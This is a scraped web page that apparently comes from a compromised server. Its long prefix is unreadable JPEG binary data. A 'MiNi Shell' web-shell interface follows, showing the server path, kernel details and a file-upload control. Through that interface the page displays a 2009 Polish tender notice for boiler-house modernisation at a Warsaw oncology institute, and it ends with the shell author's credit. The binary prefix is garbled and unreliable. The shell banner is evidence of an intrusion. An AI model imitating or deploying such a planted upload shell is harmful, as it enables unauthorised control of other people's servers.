JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090518/152766-N-2009.html

<p class="kh_header"><b>Warszawa: znak postępowania: ZZP-82/09
II ETAP MODERNIZACJI KOTŁOWNI WĘGLOWEJ NA OLEJOWO-GAZOWĄ 
W CENTRUM ONKOLOGII-INSTYTUT IM. MARII SKŁODOWSKIEJ -CURIE W WARSZAWIE</b><br>
<b>Numer ogłoszenia: 152766 - 2009; data zamieszczenia: 18.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Zamówień Publicznych przy Ministrze Zdrowia , Al. Jerozolimskie 155/115, 02-326 Warszawa, woj. mazowieckie, tel. 022 8833512, 8833552, faks 022 8833513, 8833552.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zzpprzymz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> znak postępowania: ZZP-82/09
II ETAP MODERNIZACJI KOTŁOWNI WĘGLOWEJ NA OLEJOWO-GAZOWĄ 
W CENTRUM ONKOLOGII-INSTYTUT IM. MARII SKŁODOWSKIEJ -CURIE W WARSZAWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie II etapu modernizacji kotłowni węglowej na olejowo-gazową w Centrum Onkologii Instytucie im. Marii Skłodowskiej - Curie przy ul. Roentgena 5 w Warszawie.
Budynek kotłowni zlokalizowany jest w południowej części działki przy ul. Roentgena 5. 
Etap II modernizacji kotłowni zakłada:
1.	Włączenie w układ technologiczny kotłowni dwóch zabudowanych kotłów parowych Vitomax 200 HS z palnikami gazowo - olejowymi:
a)	instalacja olejowa, 
b)	instalacja odprowadzania spalin - system dwuścienny ze stali nierdzewnej o średnicy 610 mm,
c)	wewnętrzna instalacja pary i kondensatu z układem pomiarowym pary - przepływomierz wirowy DN 150 mm;
2.	Wykonanie węzła cieplnego co., c.t. i c.w.u na potrzeby własne kotłowni;
3.	Instalacja elektryczna i AKP i A dla II etapu.
Szczegółowy opis przedmiotu zamówienia i warunki jego wykonania zawarte są w dokumentacji projektowej (łącznie z przedmiarem) oraz specyfikacji technicznej wykonania i odbioru robót budowlanych (w skrócie STWiOR) , której wykaz stanowi załącznik nr 3 do SIWZ oraz w Ogólnych warunkach umowy, które zostaną wprowadzone do umowy na roboty budowlane, które stanowią załącznik nr 1 do SIWZ

Uwaga !!!
Przedmiotowe zamówienie wykonane w II etapie musi współpracować z istniejącą kotłownią jako jednolity obiekt technologiczny..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.33.11.10-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> wymagane wadium -  	16 300,00  PLN

ZABEZPIECZENIE NALEŻYTEGO WYKONANIA UMOWY:
Jako gwarancję wykonania umowy Kupujący na czas trwania realizacji kontraktu będzie żądał od wykonawcy, którego ofertę wybrano, zabezpieczenia należytego wykonania umowy w wysokości  2 %  ceny  ofertowej.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wniosek o dopuszczenie do udziału w przetargu ograniczonym musi zawierać ( we właściwej formie ) :
-oświadczenie o spełnianiu warunków, o których mowa w art. 22 i art. 24 ustawy Prawo zamówień publicznych  oraz
-wymagane (wskazane przez Zamawiającego) dokumenty potwierdzające spełnianie warunków uprawniających do udziału w postępowaniu o zamówienie publiczne (zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r.  - Dz. U. Nr 87 poz. 605 oraz  Rozporządzeniem Prezesa Rady Ministrów z dnia 16 października 2008r. zmieniającym ww rozporządzenie  - Dz. U. Nr 188 poz. 1155 w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane).

Sposób  oceny  wniosku :
-ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez sprawdzenie, czy wyżej wymienione, żądane przez zamawiającego dokumenty potwierdzają spełnienie warunków wymienionych w art. 22 ust. 1 pkt 1-3.  (z zastrzeżeniem 26 ust. 3 ustawy P.z.p.)
oraz 
-potwierdzony oświadczeniem złożonym przez Wykonawcę czas obecności na rynku : za każdy rok - 1pkt..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wymagane dokumenty: 
1.Oświadczenie o spełnianiu warunków, o których mowa w art. 22 i 24 ustawy P.z.p.  
oraz
2.Dokumenty potwierdzające spełnienie warunków uprawniających do udziału w postępowaniu o zamówienie publiczne zgodnie z § 1 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku  (Dz. U. Nr 87, poz. 605 oraz Rozporządzenia Prezesa Rady Ministrów z dnia 16 października 2008 roku zmieniającego ww rozporządzenie - Dz. U. Nr 188, poz. 1155) w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy (w celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy P.z.p.) oraz form, w jakich te dokumenty mogą być składane, a więc:
2.1.aktualny odpis z właściwego rejestru, albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3.W przypadku, gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, dokumenty muszą być zgodne z § 2 wyżej powołanego Rozporządzenia.
4.W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego  ( art. 23 ust. 2 ustawy P.z.p. ).
a)Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia ( art. 23 ust. 3 ustawy P.z.p. );
5.W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia, Zamawiający wymaga złożenia następujących dokumentów:
5.1.Wykaz wykonanych w okresie ostatnich 5 lat zrealizowanych minimum 2 inwestycji, odpowiadających przedmiotowi zamówienia, w tym co najmniej jednej o wartości co najmniej 500 000,00 zł. Wykaz musi zawierać co najmniej:
a)nazwę i adres odbiorcy zrealizowanych inwestycji, zawierającej robotę budowlaną,
b)przeznaczenie budynku/budynków, których dotyczyła inwestycja,
c)całkowitą wartość robót budowlanych (budynku/ budynków), których dotyczyła inwestycja, daty (dzień, miesiąc, rok) wykonania usług - data rozpoczęcia i data zakończenia, każda pozycja wykazu ma być uzupełniona dokumentami (np. referencjami, opiniami, listami polecającymi), potwierdzającymi istotą swojej treści należyte wykonanie.
5.2.Wykaz osób, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, w tym przynajmniej po jednej osobie posiadającej uprawnienia budowlane do kierowania w specjalnościach:
a)konstrukcyjno-budowlanej,
b)instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych,
c)instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych; oraz wskazać przynależność do właściwej Okręgowej Izby Inżynierów Budownictwa. 
Uprawnienia winny być potwierdzone kopią właściwego dokumentu potwierdzonego za zgodność z oryginałem.
5.3.Polisa o wartości minimum 300 000,00 PLN wykazująca, że Wykonawca jest ubezpieczony w zakresie odpowiedzialności cywilnej dotyczącej prowadzonej działalności gospodarczej. Zamawiający dopuszcza, aby w przypadku nie włączenia polisy do wniosku - polisa opisana wyżej lub jej kserokopia poświadczona za zgodność z oryginałem przez Wykonawcę składającego wniosek bądź przez upełnomocnionego przedstawiciela wykonawcy polisy - została przedłożona Zamawiającemu po zakończeniu postępowania a przed zawarciem umowy Zamawiającego z wybranym Wykonawcą przedmiotu zamówienia. W takiej okoliczności (braku polisy we wniosku) wymagane jest włączenie do wniosku promesy-przyrzeczenia zawarcia umowy ubezpieczenia lub noty pokrycia (wystawionej przez ubezpieczyciela). Promesa lub nota pokrycia - mają zawierać wszystkie wyżej wymienione cechy, elementy ubezpieczenia tj. zawartości późniejszej polisy.
Wykonawcy składają oryginał lub kserokopie dokumentu (dokumentów) potwierdzone (poświadczone) za zgodność z oryginałem i podpisane przez osobę,(osoby) uprawnioną(uprawnione) do reprezentowania Wykonawcy.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
Wszystkie ww dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 20.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 88</li>
<li>2 - Okres gwarancji - 12</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ ZOSTANIE PRZEKAZANA WYKONAWCOM WRAZ Z ZAPROSZENIEM DO SKŁADANIA OFERT.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2009 godzina 10:00, miejsce: Zakład Zamówień Publicznych przy Ministrze Zdrowia
02 - 326  Warszawa,   Al.  Jerozolimskie  155,   pokój  105.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PRZEWIDYWANY TERMIN I MIEJSCE SKŁADANIA I OTWARCIA OFERT:
SKŁADANIE OFERT - w siedzibie Zamawiającego, pokój 105 ( I piętro ), do dnia  16.06.2009r. do godz. 9.00 
OTWARCIE OFERT - w siedzibie Zamawiającego pokój 113 ( I piętro ), dnia  16.06.2009r. o godz. 9.30

Zamawiający przewiduje zamówienia uzupełniające zgodnie z art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych  (Dz. U. z 2007r. Nr 223 poz. 1655 ze zmianami: Dz. U. z 2008r. Nr 171, poz. 1058).
Instrukcja sporządzenia wniosku o dopuszczenie do udziału w przetargu ograniczonym (na życzenie Wykonawcy) jest dostępna w siedzibie Zamawiającego, pokój 105 (I piętro) w godz. 800 - 1600, do dnia 27.05.2009r. do godz. 10.00.
Pod pojęciem Wniosek o dopuszczenie do udziału w przetargu ograniczonym rozumie się komplet dokumentów, jakie Wykonawca musi złożyć Zamawiającemu, zgodnie z ogłoszeniem.
Pod pojęciem czas obecności na rynku rozumie się okres liczony od daty pierwszej rejestracji (wydania uprawnień) Wykonawcy uprawniającej go do wykonywania przedmiotowej działalności.
Zamawiający udostępni do wglądu Wnioski o dopuszczenie do udziału w przetargu ograniczonym, po upływie terminu ich składania, na pisemny wniosek uczestnika postępowania.
Oświadczenia, wnioski, zawiadomienia, protesty oraz informacje Zamawiający i Wykonawcy przekazują pisemnie i faksem. Z zastrzeżeniem, że oświadczenia, wnioski, zawiadomienia, protesty oraz informacje przekazane za pomocą faksu uważa się  za złożone w terminie, jeżeli ich treść dająca się odczytać dotarła do adresata przed upływem wyznaczonego terminu (godziny pracy Zamawiającego 800-1600 w dni robocze) i została niezwłocznie potwierdzona na piśmie przez przekazującego.
Zamawiający nie dopuszcza drogi elektronicznej jako formy przekazywania oświadczeń, wniosków, zawiadomień, protestów oraz informacji pomiędzy Wykonawcą a Zamawiającym.
Zamawiający nie przewiduje zawarcia umowy ramowej, ani dokonania wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.
Informacja o złożeniu wniosku może być przekazana telefonicznie (w myśl art. 27 ust. 5 ustawy P.z.p.) przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu.
Wniosek uważa się za złożony w terminie, jeżeli przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu został on wysłany w formie pisemnej i Zamawiający otrzymał go nie później niż w terminie 7 dni od dnia upływu terminu składania wniosków.
Telefoniczną informację o złożeniu wniosku o dopuszczenie do udziału w postępowaniu Wykonawca  przekazuje pod nr 022 / 883 35 53. Zamawiający nie ponosi odpowiedzialności za informacje, które zostały przekazane pod inny nr telefonu.

Do kontaktu z Wykonawcami (w godzinach pracy Zamawiającego tj. 800 - 1600) sprawach j.w. upoważnieni są:	
Iwona Zglińska 	- tel. 0-22/883 35 53, pokój 105, e-mail : i.zglinska@zzpprzymz.pl
Joanna Henkelmann- tel. 0-22/883 35 52, pokój 102, e-mail : j.henkelmann@ zzpprzymz.pl

Creat By MiNi SheLL
Email: jattceo@gmail.com